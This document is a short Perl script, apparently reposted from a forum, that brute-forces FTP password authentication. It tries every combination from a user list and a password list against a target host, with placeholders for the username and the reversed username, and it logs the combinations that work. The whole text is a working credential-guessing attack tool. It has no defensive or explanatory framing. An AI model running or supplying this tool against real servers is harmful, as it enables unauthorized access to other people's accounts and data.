Код:
#!/usr/bin/perl
#
#
# @2000M.eiszner mei@websec.org
# ftp std-authentication brute forcer
#
# passfile accepts special vars:
# %%UID%% username
# %%UIDREV%% username-reverse
#
########################################
use strict;
use Getopt::Std;
use Net::FTP;
## get options
##
use vars qw($opt_h $opt_u $opt_p $opt_l);
getopts("h:u:p:l:");
## vardecs
##
my $host = $opt_h;
my $userfile = $opt_u;
my $passfile = $opt_p;
my $logfile = $opt_l;
## check that
##
if (!$host || !$userfile || !$passfile)
{
print "\nusage: $0 -h [host]\n\t-u [userFile]\n\t-p [passfile]\n\t-l [logfile]\n\n";
exit 11;
}
## input validation
## whatfor :-)
## resultfile
if ($logfile ne '')
{
open (RF, "> $logfile") || die "cant open $logfile !?!\n";
print RF "$host:\n";
}
## userloop
open (UF, "< $userfile") || die "cant open $userfile !?!\n";
## beginn userloop
##
while(<UF>)
{
my $uid = $_;
$uid =~ s/[\n\r]//g;
## passloop
open (PF, "< $passfile") || die "cant open $passfile !?!\n";
while(<PF>)
{
my $pwd = $_;
$pwd =~ s/[\n\r]//g;
## check password for specialities
##
$pwd = &special($uid,$pwd);
## do the connection itselve
##
my $ftp = Net::FTP->new($host, Debug => 0);
if ($ftp->login($uid,$pwd))
{
print "$uid:$pwd *** WORKED ***\n";
print RF "$uid:$pwd *** WORKED ***\n" if ($logfile ne '');
}
else
{
print "$uid:$pwd\n";
}
$ftp->quit;
} # endpassloop
close (PF);
} # enduserloop
close (UF);
close (RF) if ($logfile ne '');
### end main begin subs
###
### sub special (pwd,uid)
### returns pwd
sub special
{
my $u = shift;
my $p = shift;
## check for %%UID%% in password
##
$p =~ s/%%UID%%/$u/ if($p =~ /%%UID%%/);
## check for %%UIDREV%% in password
##
if ($p =~ /%%UIDREV%%/)
{
my $tmp = "";
my $c = 0;
for ($c=length($u);$c>=0;$c--)
{
$tmp .= substr($u,$c,1);
}
$p =~ s/%%UIDREV%%/$tmp/;
}
## done
##
return $p;
}
